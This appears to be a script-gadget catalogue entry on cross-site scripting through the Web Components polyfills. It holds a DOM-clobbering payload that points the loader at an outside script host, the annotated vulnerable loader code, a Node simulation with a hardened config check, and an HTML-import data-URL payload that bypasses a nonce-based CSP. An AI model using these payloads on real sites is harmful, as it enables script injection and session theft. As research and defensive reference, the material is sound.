The Web Components polyfills are a suite of JavaScript libraries that implement Web Components APIs for browsers that don’t have built-in support.
Since the payload relies on named access returning an HTMLCollection, it won't work on Firefox.
<!-- user input -->
<a id="ShadyDOM"></a>
<a id="ShadyDOM" name="force"></a>
<a id="WebComponents"></a>
<a id="WebComponents" name="root" href="https://gmsgadget.com/assets/xss/"></a>
<script src="https://unpkg.com/@webcomponents/[email protected]/webcomponents-loader.js"></script>
Root Cause
var polyfills = [];
// Clobbered: window.ShadyDOM becomes an HTMLCollection whose .force resolves to the <a name="force"> element (truthy)
if (
  !(
    'attachShadow' in Element.prototype && 'getRootNode' in Element.prototype
  ) ||
  (window.ShadyDOM && window.ShadyDOM.force)
) {
  polyfills.push('sd');
}
if (!window.customElements || window.customElements.forcePolyfill) {
  polyfills.push('ce');
}
// Clobbered: window.WebComponents.root resolves to the <a name="root"> element, which stringifies to its href
if (window.WebComponents.root) {
  url = window.WebComponents.root + polyfillFile;
  if (
    window.trustedTypes &&
    window.trustedTypes.isScriptURL(window.WebComponents.root)
  ) {
    url = policy.createScriptURL(url);
  }
}
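The following is an added example, not code from the polyfill project: it models the loader's config lookup above against a DOM-clobbered window and shows a hardened lookup that only accepts a plain config object with string values. Node has no DOM, so the clobbered shapes (an HTMLCollection with a named anchor that stringifies to its href) are simulated, and the bundle name polyfillFile is an assumption.

```javascript
// Assumed bundle name; the real loader derives it from the polyfills array.
const polyfillFile = 'webcomponents-sd-ce.js';

// Stand-ins for what duplicate <a id=...> elements produce in a browser:
// window.X becomes an HTMLCollection, X.name resolves to the element with
// that name, and an anchor element stringifies to its href.
class FakeAnchor {
  constructor(href) { this.href = href; }
  toString() { return this.href; }
}
class FakeHTMLCollection {
  constructor(named) { Object.assign(this, named); }
}

// Mirrors the loader: trusts whatever window.WebComponents.root is.
function unsafeRoot(win) {
  if (win.WebComponents && win.WebComponents.root) {
    return win.WebComponents.root + polyfillFile;
  }
  return null;
}
// Mirrors the loader's ShadyDOM.force check (any truthy value wins).
function unsafeForceShady(win) {
  return Boolean(win.ShadyDOM && win.ShadyDOM.force);
}

// Hardened: config must be a plain object (never a node or collection),
// root must be a real string, and force must be boolean true.
function isPlainObject(v) {
  return v !== null && typeof v === 'object' &&
    Object.getPrototypeOf(v) === Object.prototype;
}
function safeRoot(win) {
  const cfg = win.WebComponents;
  if (!isPlainObject(cfg) || typeof cfg.root !== 'string') return null;
  return cfg.root + polyfillFile;
}
function safeForceShady(win) {
  return isPlainObject(win.ShadyDOM) && win.ShadyDOM.force === true;
}

// Constructed inputs: a legitimate config and a clobbered window.
const legit = { WebComponents: { root: '/static/wc/' }, ShadyDOM: { force: true } };
const clobbered = {
  WebComponents: new FakeHTMLCollection({
    root: new FakeAnchor('https://attacker.example/assets/xss/') }),
  ShadyDOM: new FakeHTMLCollection({ force: new FakeAnchor('') }),
};
```

The unsafe lookup turns the clobbered window into a script URL under attacker control, while the hardened lookup returns null and falls back to the default path.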
Found by jackfromeast, ishmeals.
The polyfill library (webcomponents-lite 1.3.3 in the payload below) used <link rel="import"> to specify additional HTML to load, so an injected import element supplies the HTML that the polyfill loads.
<link rel="import" href="data:text/html,<script>alert(document.domain)</script>">
<script nonce="secret" src="https://cdnjs.cloudflare.com/ajax/libs/webcomponentsjs/1.3.3/webcomponents-lite.js"></script>
Found by @slekies, @kkotowicz, @sirdarckcat.